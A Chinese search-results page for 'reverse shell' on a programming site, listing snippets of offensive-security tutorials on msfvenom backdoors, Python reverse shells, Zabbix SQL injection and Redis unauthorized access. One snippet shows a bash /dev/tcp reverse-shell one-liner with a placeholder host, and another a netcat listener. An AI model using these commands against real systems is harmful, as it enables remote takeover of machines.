码迷,mamicode.com
首页 >  
搜索关键字:反弹shell    ( 74个结果
fsockopen反弹shell脚本
array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w")); $cwd = getcwd(); $msg = php_uname()."\n------------Code by Spider-------------\n"; i... ...
分类:系统相关   时间:2019-07-16 12:24:40    阅读次数:131
msf生成后门拿shell
0X01简介 这里我本来想学习 msf利用漏洞反弹shell的 但是 没有靶机....等找了靶机在弄吧 kali 172.18.5.118 靶机 172.18.5.240 先尝试能不能ping通 好的可以 那我们进行下一步 0X01爱之初体验 先在kali终端输入msfvenom -l,打开payl ...
分类:系统相关   时间:2019-05-24 11:09:13    阅读次数:369
以Python写的 反弹工具
python 反弹shell 我们知道,一般的反弹shell 可以直接使用 base 反弹 bash -i >& /dev/tcp/ownip/port 0>&1 还可以使用一些简单的命令 nc nmap 等等。。。。 nc -l -p port -vv xxx 经过前几次的攻击,他也变聪明了,知道 ...
分类:编程语言   时间:2019-04-24 12:07:01    阅读次数:321
[转帖]提权
windows提权 0,起因,由于前几天拿了一个菠菜站的webshell,但是只有iis权限,执行无法创建用户等操作,更无法对整个服务器进行控制了,于是此时便需要提权了,对于一个刚刚入门的小白来说,此刻真正意识到了提权的重要性,于是便开始学习提取相关知识,以拿下该菠菜的站点。 提权前的准备工作 1, ...
分类:其他好文   时间:2019-01-25 01:10:18    阅读次数:175
Metasploit入门系列(八)——Meterpreter(一)
上次有小伙伴私信我,想看关于Armitage在Windows平台下的使用,这里简单解释下,Armitage你可以把它看作一个壳,你的所有操作其实还是使用的msfconsole接口的命令行,我也安装过windows下的msf,但实在用的不是很习惯,想想还要自己配开源数据库postgresql,脑瓜疼, ...
分类:Web程序   时间:2018-12-30 18:58:16    阅读次数:200
Windows正向绑定shell和反向反弹shell的Python代码
Windows下的shell原理 经过查阅资料,使用os.dup2(nfd, ofd)的方式重定向socket的输入输出到windows系统的cmd是无法做到的,属于系统原因,不能直接复制Linux下的方案,所以只能写程序收集socket的输入,调用subprocess.Popen去执行,然后获取输 ...
分类:编程语言   时间:2018-10-12 21:20:15    阅读次数:317
linux的shell后门尝试以及python快速转C
零、背景 最近研究了一下之前的反弹shell的python代码块,写了一点代码尝试在LInux下绑定和反弹shell(正反向),看了一些代码,基本是两种思路。1、本地shell的输入输出通过管道与socket的输入输出进行映射。2、socket的指令在agent本地调用命令执行,结果再传回去(但是目 ...
分类:编程语言   时间:2018-10-10 14:08:51    阅读次数:325
Zabbix sql注入漏洞脚本执行反弹shell
exp检测是否存在SQL注入漏洞root@ubuntu:~# python zabbix.py http://ip:9090/+ + Python Zabbix<3.0.4 SQL注入 Exploitsuccess+ +Zabbix 存在SQL注入漏洞! 管理员 用户名密码:None 管理员 Ses ...
分类:数据库   时间:2018-05-18 20:11:57    阅读次数:1289
【Python】Part1 应用1-Netcat
01 简介 netcat的主要功能是通过tcp或udp协议传输读写数据。 下面代码用python编写了tcp客户端,服务端,从而实现上传文件,本地执行命令,反弹shell三种功能。 02 代码 ...
分类:编程语言   时间:2018-05-13 22:04:35    阅读次数:175
Redis未授权访问反弹shell
Redis未授权访问反弹shell 目标主机:10.104.11.178 攻击机:kali 攻击步骤: 1.与目标主机连接 2.kali主机进行监听 3.写入反弹shell语句 4.反弹shell连接成功 ...
分类:系统相关   时间:2018-05-03 19:25:07    阅读次数:1779
74条   上一页 1 ... 3 4 5 6 7 8 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!